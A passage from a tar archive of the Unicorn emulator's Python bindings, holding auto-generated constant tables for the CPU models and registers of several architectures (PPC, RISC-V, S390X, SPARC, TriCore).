UC_CPU_PPC32_7441_V2_1 = 264 UC_CPU_PPC32_7441_V2_3 = 265 UC_CPU_PPC32_7451_V2_3 = 266 UC_CPU_PPC32_7441_V2_10 = 267 UC_CPU_PPC32_7451_V2_10 = 268 UC_CPU_PPC32_7445_V1_0 = 269 UC_CPU_PPC32_7455_V1_0 = 270 UC_CPU_PPC32_7445_V2_1 = 271 UC_CPU_PPC32_7455_V2_1 = 272 UC_CPU_PPC32_7445_V3_2 = 273 UC_CPU_PPC32_7455_V3_2 = 274 UC_CPU_PPC32_7445_V3_3 = 275 UC_CPU_PPC32_7455_V3_3 = 276 UC_CPU_PPC32_7445_V3_4 = 277 UC_CPU_PPC32_7455_V3_4 = 278 UC_CPU_PPC32_7447_V1_0 = 279 UC_CPU_PPC32_7457_V1_0 = 280 UC_CPU_PPC32_7447_V1_1 = 281 UC_CPU_PPC32_7457_V1_1 = 282 UC_CPU_PPC32_7457_V1_2 = 283 UC_CPU_PPC32_7447A_V1_0 = 284 UC_CPU_PPC32_7457A_V1_0 = 285 UC_CPU_PPC32_7447A_V1_1 = 286 UC_CPU_PPC32_7457A_V1_1 = 287 UC_CPU_PPC32_7447A_V1_2 = 288 UC_CPU_PPC32_7457A_V1_2 = 289 UC_CPU_PPC32_ENDING = 290 # PPC64 CPU UC_CPU_PPC64_E5500 = 0 UC_CPU_PPC64_E6500 = 1 UC_CPU_PPC64_970_V2_2 = 2 UC_CPU_PPC64_970FX_V1_0 = 3 UC_CPU_PPC64_970FX_V2_0 = 4 UC_CPU_PPC64_970FX_V2_1 = 5 UC_CPU_PPC64_970FX_V3_0 = 6 UC_CPU_PPC64_970FX_V3_1 = 7 UC_CPU_PPC64_970MP_V1_0 = 8 UC_CPU_PPC64_970MP_V1_1 = 9 UC_CPU_PPC64_POWER5_V2_1 = 10 UC_CPU_PPC64_POWER7_V2_3 = 11 UC_CPU_PPC64_POWER7_V2_1 = 12 UC_CPU_PPC64_POWER8E_V2_1 = 13 UC_CPU_PPC64_POWER8_V2_0 = 14 UC_CPU_PPC64_POWER8NVL_V1_0 = 15 UC_CPU_PPC64_POWER9_V1_0 = 16 UC_CPU_PPC64_POWER9_V2_0 = 17 UC_CPU_PPC64_POWER10_V1_0 = 18 UC_CPU_PPC64_ENDING = 19 # PPC registers UC_PPC_REG_INVALID = 0 # General purpose registers UC_PPC_REG_PC = 1 UC_PPC_REG_0 = 2 UC_PPC_REG_1 = 3 UC_PPC_REG_2 = 4 UC_PPC_REG_3 = 5 UC_PPC_REG_4 = 6 UC_PPC_REG_5 = 7 UC_PPC_REG_6 = 8 UC_PPC_REG_7 = 9 UC_PPC_REG_8 = 10 UC_PPC_REG_9 = 11 UC_PPC_REG_10 = 12 UC_PPC_REG_11 = 13 UC_PPC_REG_12 = 14 UC_PPC_REG_13 = 15 UC_PPC_REG_14 = 16 UC_PPC_REG_15 = 17 UC_PPC_REG_16 = 18 UC_PPC_REG_17 = 19 UC_PPC_REG_18 = 20 UC_PPC_REG_19 = 21 UC_PPC_REG_20 = 22 UC_PPC_REG_21 = 23 UC_PPC_REG_22 = 24 UC_PPC_REG_23 = 25 UC_PPC_REG_24 = 26 UC_PPC_REG_25 = 27 UC_PPC_REG_26 = 28 UC_PPC_REG_27 = 29 UC_PPC_REG_28 = 30 UC_PPC_REG_29 = 31 UC_PPC_REG_30 = 32 UC_PPC_REG_31 = 33 UC_PPC_REG_CR0 = 34 UC_PPC_REG_CR1 = 35 UC_PPC_REG_CR2 = 36 UC_PPC_REG_CR3 = 37 UC_PPC_REG_CR4 = 38 UC_PPC_REG_CR5 = 39 UC_PPC_REG_CR6 = 40 UC_PPC_REG_CR7 = 41 UC_PPC_REG_FPR0 = 42 UC_PPC_REG_FPR1 = 43 UC_PPC_REG_FPR2 = 44 UC_PPC_REG_FPR3 = 45 UC_PPC_REG_FPR4 = 46 UC_PPC_REG_FPR5 = 47 UC_PPC_REG_FPR6 = 48 UC_PPC_REG_FPR7 = 49 UC_PPC_REG_FPR8 = 50 UC_PPC_REG_FPR9 = 51 UC_PPC_REG_FPR10 = 52 UC_PPC_REG_FPR11 = 53 UC_PPC_REG_FPR12 = 54 UC_PPC_REG_FPR13 = 55 UC_PPC_REG_FPR14 = 56 UC_PPC_REG_FPR15 = 57 UC_PPC_REG_FPR16 = 58 UC_PPC_REG_FPR17 = 59 UC_PPC_REG_FPR18 = 60 UC_PPC_REG_FPR19 = 61 UC_PPC_REG_FPR20 = 62 UC_PPC_REG_FPR21 = 63 UC_PPC_REG_FPR22 = 64 UC_PPC_REG_FPR23 = 65 UC_PPC_REG_FPR24 = 66 UC_PPC_REG_FPR25 = 67 UC_PPC_REG_FPR26 = 68 UC_PPC_REG_FPR27 = 69 UC_PPC_REG_FPR28 = 70 UC_PPC_REG_FPR29 = 71 UC_PPC_REG_FPR30 = 72 UC_PPC_REG_FPR31 = 73 UC_PPC_REG_LR = 74 UC_PPC_REG_XER = 75 UC_PPC_REG_CTR = 76 UC_PPC_REG_MSR = 77 UC_PPC_REG_FPSCR = 78 UC_PPC_REG_CR = 79 UC_PPC_REG_ENDING = 80 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/py.typed������������������������������������������������������0000664�0000000�0000000�00000000000�14675241067�0021464�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/riscv_const.py������������������������������������������������0000664�0000000�0000000�00000015460�14675241067�0022713�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [riscv_const.py] # RISCV32 CPU UC_CPU_RISCV32_ANY = 0 UC_CPU_RISCV32_BASE32 = 1 UC_CPU_RISCV32_SIFIVE_E31 = 2 UC_CPU_RISCV32_SIFIVE_U34 = 3 UC_CPU_RISCV32_ENDING = 4 # RISCV64 CPU UC_CPU_RISCV64_ANY = 0 UC_CPU_RISCV64_BASE64 = 1 UC_CPU_RISCV64_SIFIVE_E51 = 2 UC_CPU_RISCV64_SIFIVE_U54 = 3 UC_CPU_RISCV64_ENDING = 4 # RISCV registers UC_RISCV_REG_INVALID = 0 # General purpose registers UC_RISCV_REG_X0 = 1 UC_RISCV_REG_X1 = 2 UC_RISCV_REG_X2 = 3 UC_RISCV_REG_X3 = 4 UC_RISCV_REG_X4 = 5 UC_RISCV_REG_X5 = 6 UC_RISCV_REG_X6 = 7 UC_RISCV_REG_X7 = 8 UC_RISCV_REG_X8 = 9 UC_RISCV_REG_X9 = 10 UC_RISCV_REG_X10 = 11 UC_RISCV_REG_X11 = 12 UC_RISCV_REG_X12 = 13 UC_RISCV_REG_X13 = 14 UC_RISCV_REG_X14 = 15 UC_RISCV_REG_X15 = 16 UC_RISCV_REG_X16 = 17 UC_RISCV_REG_X17 = 18 UC_RISCV_REG_X18 = 19 UC_RISCV_REG_X19 = 20 UC_RISCV_REG_X20 = 21 UC_RISCV_REG_X21 = 22 UC_RISCV_REG_X22 = 23 UC_RISCV_REG_X23 = 24 UC_RISCV_REG_X24 = 25 UC_RISCV_REG_X25 = 26 UC_RISCV_REG_X26 = 27 UC_RISCV_REG_X27 = 28 UC_RISCV_REG_X28 = 29 UC_RISCV_REG_X29 = 30 UC_RISCV_REG_X30 = 31 UC_RISCV_REG_X31 = 32 # RISCV CSR UC_RISCV_REG_USTATUS = 33 UC_RISCV_REG_UIE = 34 UC_RISCV_REG_UTVEC = 35 UC_RISCV_REG_USCRATCH = 36 UC_RISCV_REG_UEPC = 37 UC_RISCV_REG_UCAUSE = 38 UC_RISCV_REG_UTVAL = 39 UC_RISCV_REG_UIP = 40 UC_RISCV_REG_FFLAGS = 41 UC_RISCV_REG_FRM = 42 UC_RISCV_REG_FCSR = 43 UC_RISCV_REG_CYCLE = 44 UC_RISCV_REG_TIME = 45 UC_RISCV_REG_INSTRET = 46 UC_RISCV_REG_HPMCOUNTER3 = 47 UC_RISCV_REG_HPMCOUNTER4 = 48 UC_RISCV_REG_HPMCOUNTER5 = 49 UC_RISCV_REG_HPMCOUNTER6 = 50 UC_RISCV_REG_HPMCOUNTER7 = 51 UC_RISCV_REG_HPMCOUNTER8 = 52 UC_RISCV_REG_HPMCOUNTER9 = 53 UC_RISCV_REG_HPMCOUNTER10 = 54 UC_RISCV_REG_HPMCOUNTER11 = 55 UC_RISCV_REG_HPMCOUNTER12 = 56 UC_RISCV_REG_HPMCOUNTER13 = 57 UC_RISCV_REG_HPMCOUNTER14 = 58 UC_RISCV_REG_HPMCOUNTER15 = 59 UC_RISCV_REG_HPMCOUNTER16 = 60 UC_RISCV_REG_HPMCOUNTER17 = 61 UC_RISCV_REG_HPMCOUNTER18 = 62 UC_RISCV_REG_HPMCOUNTER19 = 63 UC_RISCV_REG_HPMCOUNTER20 = 64 UC_RISCV_REG_HPMCOUNTER21 = 65 UC_RISCV_REG_HPMCOUNTER22 = 66 UC_RISCV_REG_HPMCOUNTER23 = 67 UC_RISCV_REG_HPMCOUNTER24 = 68 UC_RISCV_REG_HPMCOUNTER25 = 69 UC_RISCV_REG_HPMCOUNTER26 = 70 UC_RISCV_REG_HPMCOUNTER27 = 71 UC_RISCV_REG_HPMCOUNTER28 = 72 UC_RISCV_REG_HPMCOUNTER29 = 73 UC_RISCV_REG_HPMCOUNTER30 = 74 UC_RISCV_REG_HPMCOUNTER31 = 75 UC_RISCV_REG_CYCLEH = 76 UC_RISCV_REG_TIMEH = 77 UC_RISCV_REG_INSTRETH = 78 UC_RISCV_REG_HPMCOUNTER3H = 79 UC_RISCV_REG_HPMCOUNTER4H = 80 UC_RISCV_REG_HPMCOUNTER5H = 81 UC_RISCV_REG_HPMCOUNTER6H = 82 UC_RISCV_REG_HPMCOUNTER7H = 83 UC_RISCV_REG_HPMCOUNTER8H = 84 UC_RISCV_REG_HPMCOUNTER9H = 85 UC_RISCV_REG_HPMCOUNTER10H = 86 UC_RISCV_REG_HPMCOUNTER11H = 87 UC_RISCV_REG_HPMCOUNTER12H = 88 UC_RISCV_REG_HPMCOUNTER13H = 89 UC_RISCV_REG_HPMCOUNTER14H = 90 UC_RISCV_REG_HPMCOUNTER15H = 91 UC_RISCV_REG_HPMCOUNTER16H = 92 UC_RISCV_REG_HPMCOUNTER17H = 93 UC_RISCV_REG_HPMCOUNTER18H = 94 UC_RISCV_REG_HPMCOUNTER19H = 95 UC_RISCV_REG_HPMCOUNTER20H = 96 UC_RISCV_REG_HPMCOUNTER21H = 97 UC_RISCV_REG_HPMCOUNTER22H = 98 UC_RISCV_REG_HPMCOUNTER23H = 99 UC_RISCV_REG_HPMCOUNTER24H = 100 UC_RISCV_REG_HPMCOUNTER25H = 101 UC_RISCV_REG_HPMCOUNTER26H = 102 UC_RISCV_REG_HPMCOUNTER27H = 103 UC_RISCV_REG_HPMCOUNTER28H = 104 UC_RISCV_REG_HPMCOUNTER29H = 105 UC_RISCV_REG_HPMCOUNTER30H = 106 UC_RISCV_REG_HPMCOUNTER31H = 107 UC_RISCV_REG_MCYCLE = 108 UC_RISCV_REG_MINSTRET = 109 UC_RISCV_REG_MCYCLEH = 110 UC_RISCV_REG_MINSTRETH = 111 UC_RISCV_REG_MVENDORID = 112 UC_RISCV_REG_MARCHID = 113 UC_RISCV_REG_MIMPID = 114 UC_RISCV_REG_MHARTID = 115 UC_RISCV_REG_MSTATUS = 116 UC_RISCV_REG_MISA = 117 UC_RISCV_REG_MEDELEG = 118 UC_RISCV_REG_MIDELEG = 119 UC_RISCV_REG_MIE = 120 UC_RISCV_REG_MTVEC = 121 UC_RISCV_REG_MCOUNTEREN = 122 UC_RISCV_REG_MSTATUSH = 123 UC_RISCV_REG_MUCOUNTEREN = 124 UC_RISCV_REG_MSCOUNTEREN = 125 UC_RISCV_REG_MHCOUNTEREN = 126 UC_RISCV_REG_MSCRATCH = 127 UC_RISCV_REG_MEPC = 128 UC_RISCV_REG_MCAUSE = 129 UC_RISCV_REG_MTVAL = 130 UC_RISCV_REG_MIP = 131 UC_RISCV_REG_MBADADDR = 132 UC_RISCV_REG_SSTATUS = 133 UC_RISCV_REG_SEDELEG = 134 UC_RISCV_REG_SIDELEG = 135 UC_RISCV_REG_SIE = 136 UC_RISCV_REG_STVEC = 137 UC_RISCV_REG_SCOUNTEREN = 138 UC_RISCV_REG_SSCRATCH = 139 UC_RISCV_REG_SEPC = 140 UC_RISCV_REG_SCAUSE = 141 UC_RISCV_REG_STVAL = 142 UC_RISCV_REG_SIP = 143 UC_RISCV_REG_SBADADDR = 144 UC_RISCV_REG_SPTBR = 145 UC_RISCV_REG_SATP = 146 UC_RISCV_REG_HSTATUS = 147 UC_RISCV_REG_HEDELEG = 148 UC_RISCV_REG_HIDELEG = 149 UC_RISCV_REG_HIE = 150 UC_RISCV_REG_HCOUNTEREN = 151 UC_RISCV_REG_HTVAL = 152 UC_RISCV_REG_HIP = 153 UC_RISCV_REG_HTINST = 154 UC_RISCV_REG_HGATP = 155 UC_RISCV_REG_HTIMEDELTA = 156 UC_RISCV_REG_HTIMEDELTAH = 157 # Floating-point registers UC_RISCV_REG_F0 = 158 UC_RISCV_REG_F1 = 159 UC_RISCV_REG_F2 = 160 UC_RISCV_REG_F3 = 161 UC_RISCV_REG_F4 = 162 UC_RISCV_REG_F5 = 163 UC_RISCV_REG_F6 = 164 UC_RISCV_REG_F7 = 165 UC_RISCV_REG_F8 = 166 UC_RISCV_REG_F9 = 167 UC_RISCV_REG_F10 = 168 UC_RISCV_REG_F11 = 169 UC_RISCV_REG_F12 = 170 UC_RISCV_REG_F13 = 171 UC_RISCV_REG_F14 = 172 UC_RISCV_REG_F15 = 173 UC_RISCV_REG_F16 = 174 UC_RISCV_REG_F17 = 175 UC_RISCV_REG_F18 = 176 UC_RISCV_REG_F19 = 177 UC_RISCV_REG_F20 = 178 UC_RISCV_REG_F21 = 179 UC_RISCV_REG_F22 = 180 UC_RISCV_REG_F23 = 181 UC_RISCV_REG_F24 = 182 UC_RISCV_REG_F25 = 183 UC_RISCV_REG_F26 = 184 UC_RISCV_REG_F27 = 185 UC_RISCV_REG_F28 = 186 UC_RISCV_REG_F29 = 187 UC_RISCV_REG_F30 = 188 UC_RISCV_REG_F31 = 189 UC_RISCV_REG_PC = 190 UC_RISCV_REG_ENDING = 191 # Alias registers UC_RISCV_REG_ZERO = 1 UC_RISCV_REG_RA = 2 UC_RISCV_REG_SP = 3 UC_RISCV_REG_GP = 4 UC_RISCV_REG_TP = 5 UC_RISCV_REG_T0 = 6 UC_RISCV_REG_T1 = 7 UC_RISCV_REG_T2 = 8 UC_RISCV_REG_S0 = 9 UC_RISCV_REG_FP = 9 UC_RISCV_REG_S1 = 10 UC_RISCV_REG_A0 = 11 UC_RISCV_REG_A1 = 12 UC_RISCV_REG_A2 = 13 UC_RISCV_REG_A3 = 14 UC_RISCV_REG_A4 = 15 UC_RISCV_REG_A5 = 16 UC_RISCV_REG_A6 = 17 UC_RISCV_REG_A7 = 18 UC_RISCV_REG_S2 = 19 UC_RISCV_REG_S3 = 20 UC_RISCV_REG_S4 = 21 UC_RISCV_REG_S5 = 22 UC_RISCV_REG_S6 = 23 UC_RISCV_REG_S7 = 24 UC_RISCV_REG_S8 = 25 UC_RISCV_REG_S9 = 26 UC_RISCV_REG_S10 = 27 UC_RISCV_REG_S11 = 28 UC_RISCV_REG_T3 = 29 UC_RISCV_REG_T4 = 30 UC_RISCV_REG_T5 = 31 UC_RISCV_REG_T6 = 32 UC_RISCV_REG_FT0 = 158 UC_RISCV_REG_FT1 = 159 UC_RISCV_REG_FT2 = 160 UC_RISCV_REG_FT3 = 161 UC_RISCV_REG_FT4 = 162 UC_RISCV_REG_FT5 = 163 UC_RISCV_REG_FT6 = 164 UC_RISCV_REG_FT7 = 165 UC_RISCV_REG_FS0 = 166 UC_RISCV_REG_FS1 = 167 UC_RISCV_REG_FA0 = 168 UC_RISCV_REG_FA1 = 169 UC_RISCV_REG_FA2 = 170 UC_RISCV_REG_FA3 = 171 UC_RISCV_REG_FA4 = 172 UC_RISCV_REG_FA5 = 173 UC_RISCV_REG_FA6 = 174 UC_RISCV_REG_FA7 = 175 UC_RISCV_REG_FS2 = 176 UC_RISCV_REG_FS3 = 177 UC_RISCV_REG_FS4 = 178 UC_RISCV_REG_FS5 = 179 UC_RISCV_REG_FS6 = 180 UC_RISCV_REG_FS7 = 181 UC_RISCV_REG_FS8 = 182 UC_RISCV_REG_FS9 = 183 UC_RISCV_REG_FS10 = 184 UC_RISCV_REG_FS11 = 185 UC_RISCV_REG_FT8 = 186 UC_RISCV_REG_FT9 = 187 UC_RISCV_REG_FT10 = 188 UC_RISCV_REG_FT11 = 189 ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/s390x_const.py������������������������������������������������0000664�0000000�0000000�00000005047�14675241067�0022453�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [s390x_const.py] # S390X CPU UC_CPU_S390X_Z900 = 0 UC_CPU_S390X_Z900_2 = 1 UC_CPU_S390X_Z900_3 = 2 UC_CPU_S390X_Z800 = 3 UC_CPU_S390X_Z990 = 4 UC_CPU_S390X_Z990_2 = 5 UC_CPU_S390X_Z990_3 = 6 UC_CPU_S390X_Z890 = 7 UC_CPU_S390X_Z990_4 = 8 UC_CPU_S390X_Z890_2 = 9 UC_CPU_S390X_Z990_5 = 10 UC_CPU_S390X_Z890_3 = 11 UC_CPU_S390X_Z9EC = 12 UC_CPU_S390X_Z9EC_2 = 13 UC_CPU_S390X_Z9BC = 14 UC_CPU_S390X_Z9EC_3 = 15 UC_CPU_S390X_Z9BC_2 = 16 UC_CPU_S390X_Z10EC = 17 UC_CPU_S390X_Z10EC_2 = 18 UC_CPU_S390X_Z10BC = 19 UC_CPU_S390X_Z10EC_3 = 20 UC_CPU_S390X_Z10BC_2 = 21 UC_CPU_S390X_Z196 = 22 UC_CPU_S390X_Z196_2 = 23 UC_CPU_S390X_Z114 = 24 UC_CPU_S390X_ZEC12 = 25 UC_CPU_S390X_ZEC12_2 = 26 UC_CPU_S390X_ZBC12 = 27 UC_CPU_S390X_Z13 = 28 UC_CPU_S390X_Z13_2 = 29 UC_CPU_S390X_Z13S = 30 UC_CPU_S390X_Z14 = 31 UC_CPU_S390X_Z14_2 = 32 UC_CPU_S390X_Z14ZR1 = 33 UC_CPU_S390X_GEN15A = 34 UC_CPU_S390X_GEN15B = 35 UC_CPU_S390X_QEMU = 36 UC_CPU_S390X_MAX = 37 UC_CPU_S390X_ENDING = 38 # S390X registers UC_S390X_REG_INVALID = 0 # General purpose registers UC_S390X_REG_R0 = 1 UC_S390X_REG_R1 = 2 UC_S390X_REG_R2 = 3 UC_S390X_REG_R3 = 4 UC_S390X_REG_R4 = 5 UC_S390X_REG_R5 = 6 UC_S390X_REG_R6 = 7 UC_S390X_REG_R7 = 8 UC_S390X_REG_R8 = 9 UC_S390X_REG_R9 = 10 UC_S390X_REG_R10 = 11 UC_S390X_REG_R11 = 12 UC_S390X_REG_R12 = 13 UC_S390X_REG_R13 = 14 UC_S390X_REG_R14 = 15 UC_S390X_REG_R15 = 16 # Floating point registers UC_S390X_REG_F0 = 17 UC_S390X_REG_F1 = 18 UC_S390X_REG_F2 = 19 UC_S390X_REG_F3 = 20 UC_S390X_REG_F4 = 21 UC_S390X_REG_F5 = 22 UC_S390X_REG_F6 = 23 UC_S390X_REG_F7 = 24 UC_S390X_REG_F8 = 25 UC_S390X_REG_F9 = 26 UC_S390X_REG_F10 = 27 UC_S390X_REG_F11 = 28 UC_S390X_REG_F12 = 29 UC_S390X_REG_F13 = 30 UC_S390X_REG_F14 = 31 UC_S390X_REG_F15 = 32 UC_S390X_REG_F16 = 33 UC_S390X_REG_F17 = 34 UC_S390X_REG_F18 = 35 UC_S390X_REG_F19 = 36 UC_S390X_REG_F20 = 37 UC_S390X_REG_F21 = 38 UC_S390X_REG_F22 = 39 UC_S390X_REG_F23 = 40 UC_S390X_REG_F24 = 41 UC_S390X_REG_F25 = 42 UC_S390X_REG_F26 = 43 UC_S390X_REG_F27 = 44 UC_S390X_REG_F28 = 45 UC_S390X_REG_F29 = 46 UC_S390X_REG_F30 = 47 UC_S390X_REG_F31 = 48 # Access registers UC_S390X_REG_A0 = 49 UC_S390X_REG_A1 = 50 UC_S390X_REG_A2 = 51 UC_S390X_REG_A3 = 52 UC_S390X_REG_A4 = 53 UC_S390X_REG_A5 = 54 UC_S390X_REG_A6 = 55 UC_S390X_REG_A7 = 56 UC_S390X_REG_A8 = 57 UC_S390X_REG_A9 = 58 UC_S390X_REG_A10 = 59 UC_S390X_REG_A11 = 60 UC_S390X_REG_A12 = 61 UC_S390X_REG_A13 = 62 UC_S390X_REG_A14 = 63 UC_S390X_REG_A15 = 64 UC_S390X_REG_PC = 65 UC_S390X_REG_PSWM = 66 UC_S390X_REG_ENDING = 67 # Alias registers �����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/sparc_const.py������������������������������������������������0000664�0000000�0000000�00000006230�14675241067�0022670�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [sparc_const.py] # SPARC32 CPU UC_CPU_SPARC32_FUJITSU_MB86904 = 0 UC_CPU_SPARC32_FUJITSU_MB86907 = 1 UC_CPU_SPARC32_TI_MICROSPARC_I = 2 UC_CPU_SPARC32_TI_MICROSPARC_II = 3 UC_CPU_SPARC32_TI_MICROSPARC_IIEP = 4 UC_CPU_SPARC32_TI_SUPERSPARC_40 = 5 UC_CPU_SPARC32_TI_SUPERSPARC_50 = 6 UC_CPU_SPARC32_TI_SUPERSPARC_51 = 7 UC_CPU_SPARC32_TI_SUPERSPARC_60 = 8 UC_CPU_SPARC32_TI_SUPERSPARC_61 = 9 UC_CPU_SPARC32_TI_SUPERSPARC_II = 10 UC_CPU_SPARC32_LEON2 = 11 UC_CPU_SPARC32_LEON3 = 12 UC_CPU_SPARC32_ENDING = 13 # SPARC64 CPU UC_CPU_SPARC64_FUJITSU = 0 UC_CPU_SPARC64_FUJITSU_III = 1 UC_CPU_SPARC64_FUJITSU_IV = 2 UC_CPU_SPARC64_FUJITSU_V = 3 UC_CPU_SPARC64_TI_ULTRASPARC_I = 4 UC_CPU_SPARC64_TI_ULTRASPARC_II = 5 UC_CPU_SPARC64_TI_ULTRASPARC_III = 6 UC_CPU_SPARC64_TI_ULTRASPARC_IIE = 7 UC_CPU_SPARC64_SUN_ULTRASPARC_III = 8 UC_CPU_SPARC64_SUN_ULTRASPARC_III_CU = 9 UC_CPU_SPARC64_SUN_ULTRASPARC_IIII = 10 UC_CPU_SPARC64_SUN_ULTRASPARC_IV = 11 UC_CPU_SPARC64_SUN_ULTRASPARC_IV_PLUS = 12 UC_CPU_SPARC64_SUN_ULTRASPARC_IIII_PLUS = 13 UC_CPU_SPARC64_SUN_ULTRASPARC_T1 = 14 UC_CPU_SPARC64_SUN_ULTRASPARC_T2 = 15 UC_CPU_SPARC64_NEC_ULTRASPARC_I = 16 UC_CPU_SPARC64_ENDING = 17 # SPARC registers UC_SPARC_REG_INVALID = 0 UC_SPARC_REG_F0 = 1 UC_SPARC_REG_F1 = 2 UC_SPARC_REG_F2 = 3 UC_SPARC_REG_F3 = 4 UC_SPARC_REG_F4 = 5 UC_SPARC_REG_F5 = 6 UC_SPARC_REG_F6 = 7 UC_SPARC_REG_F7 = 8 UC_SPARC_REG_F8 = 9 UC_SPARC_REG_F9 = 10 UC_SPARC_REG_F10 = 11 UC_SPARC_REG_F11 = 12 UC_SPARC_REG_F12 = 13 UC_SPARC_REG_F13 = 14 UC_SPARC_REG_F14 = 15 UC_SPARC_REG_F15 = 16 UC_SPARC_REG_F16 = 17 UC_SPARC_REG_F17 = 18 UC_SPARC_REG_F18 = 19 UC_SPARC_REG_F19 = 20 UC_SPARC_REG_F20 = 21 UC_SPARC_REG_F21 = 22 UC_SPARC_REG_F22 = 23 UC_SPARC_REG_F23 = 24 UC_SPARC_REG_F24 = 25 UC_SPARC_REG_F25 = 26 UC_SPARC_REG_F26 = 27 UC_SPARC_REG_F27 = 28 UC_SPARC_REG_F28 = 29 UC_SPARC_REG_F29 = 30 UC_SPARC_REG_F30 = 31 UC_SPARC_REG_F31 = 32 UC_SPARC_REG_F32 = 33 UC_SPARC_REG_F34 = 34 UC_SPARC_REG_F36 = 35 UC_SPARC_REG_F38 = 36 UC_SPARC_REG_F40 = 37 UC_SPARC_REG_F42 = 38 UC_SPARC_REG_F44 = 39 UC_SPARC_REG_F46 = 40 UC_SPARC_REG_F48 = 41 UC_SPARC_REG_F50 = 42 UC_SPARC_REG_F52 = 43 UC_SPARC_REG_F54 = 44 UC_SPARC_REG_F56 = 45 UC_SPARC_REG_F58 = 46 UC_SPARC_REG_F60 = 47 UC_SPARC_REG_F62 = 48 UC_SPARC_REG_FCC0 = 49 UC_SPARC_REG_FCC1 = 50 UC_SPARC_REG_FCC2 = 51 UC_SPARC_REG_FCC3 = 52 UC_SPARC_REG_G0 = 53 UC_SPARC_REG_G1 = 54 UC_SPARC_REG_G2 = 55 UC_SPARC_REG_G3 = 56 UC_SPARC_REG_G4 = 57 UC_SPARC_REG_G5 = 58 UC_SPARC_REG_G6 = 59 UC_SPARC_REG_G7 = 60 UC_SPARC_REG_I0 = 61 UC_SPARC_REG_I1 = 62 UC_SPARC_REG_I2 = 63 UC_SPARC_REG_I3 = 64 UC_SPARC_REG_I4 = 65 UC_SPARC_REG_I5 = 66 UC_SPARC_REG_FP = 67 UC_SPARC_REG_I7 = 68 UC_SPARC_REG_ICC = 69 UC_SPARC_REG_L0 = 70 UC_SPARC_REG_L1 = 71 UC_SPARC_REG_L2 = 72 UC_SPARC_REG_L3 = 73 UC_SPARC_REG_L4 = 74 UC_SPARC_REG_L5 = 75 UC_SPARC_REG_L6 = 76 UC_SPARC_REG_L7 = 77 UC_SPARC_REG_O0 = 78 UC_SPARC_REG_O1 = 79 UC_SPARC_REG_O2 = 80 UC_SPARC_REG_O3 = 81 UC_SPARC_REG_O4 = 82 UC_SPARC_REG_O5 = 83 UC_SPARC_REG_SP = 84 UC_SPARC_REG_O7 = 85 UC_SPARC_REG_Y = 86 UC_SPARC_REG_XCC = 87 UC_SPARC_REG_PC = 88 UC_SPARC_REG_ENDING = 89 UC_SPARC_REG_O6 = 84 UC_SPARC_REG_I6 = 67 ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/bindings/python/unicorn/tricore_const.py����������������������������������������������0000664�0000000�0000000�00000006003�14675241067�0023225�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [tricore_const.py] # TRICORE CPU UC_CPU_TRICORE_TC1796 = 0 UC_CPU_TRICORE_TC1797 = 1 UC_CPU_TRICORE_TC27X = 2 UC_CPU_TRICORE_ENDING = 3 # TRICORE registers UC_TRICORE_REG_INVALID = 0 UC_TRICORE_REG_A0 = 1 UC_TRICORE_REG_A1 = 2 UC_TRICORE_REG_A2 = 3 UC_TRICORE_REG_A3 = 4 UC_TRICORE_REG_A4 = 5 UC_TRICORE_REG_A5 = 6 UC_TRICORE_REG_A6 = 7 UC_TRICORE_REG_A7 = 8 UC_TRICORE_REG_A8 = 9 UC_TRICORE_REG_A9 = 10 UC_TRICORE_REG_A10 = 11 UC_TRICORE_REG_A11 = 12 UC_TRICORE_REG_A12 = 13 UC_TRICORE_REG_A13 = 14 UC_TRICORE_REG_A14 = 15 UC_TRICORE_REG_A15 = 16 UC_TRICORE_REG_D0 = 17 UC_TRICORE_REG_D1 = 18 UC_TRICORE_REG_D2 = 19 UC_TRICORE_REG_D3 = 20 UC_TRICORE_REG_D4 = 21 UC_TRICORE_REG_D5 = 22 UC_TRICORE_REG_D6 = 23 UC_TRICORE_REG_D7 = 24 UC_TRICORE_REG_D8 = 25 UC_TRICORE_REG_D9 = 26 UC_TRICORE_REG_D10 = 27 UC_TRICORE_REG_D11 = 28 UC_TRICORE_REG_D12 = 29 UC_TRICORE_REG_D13 = 30 UC_TRICORE_REG_D14 = 31 UC_TRICORE_REG_D15 = 32 UC_TRICORE_REG_PCXI = 33 UC_TRICORE_REG_PSW = 34 UC_TRICORE_REG_PSW_USB_C = 35 UC_TRICORE_REG_PSW_USB_V = 36 UC_TRICORE_REG_PSW_USB_SV = 37 UC_TRICORE_REG_PSW_USB_AV = 38 UC_TRICORE_REG_PSW_USB_SAV = 39 UC_TRICORE_REG_PC = 40 UC_TRICORE_REG_SYSCON = 41 UC_TRICORE_REG_CPU_ID = 42 UC_TRICORE_REG_BIV = 43 UC_TRICORE_REG_BTV = 44 UC_TRICORE_REG_ISP = 45 UC_TRICORE_REG_ICR = 46 UC_TRICORE_REG_FCX = 47 UC_TRICORE_REG_LCX = 48 UC_TRICORE_REG_COMPAT = 49 UC_TRICORE_REG_DPR0_U = 50 UC_TRICORE_REG_DPR1_U = 51 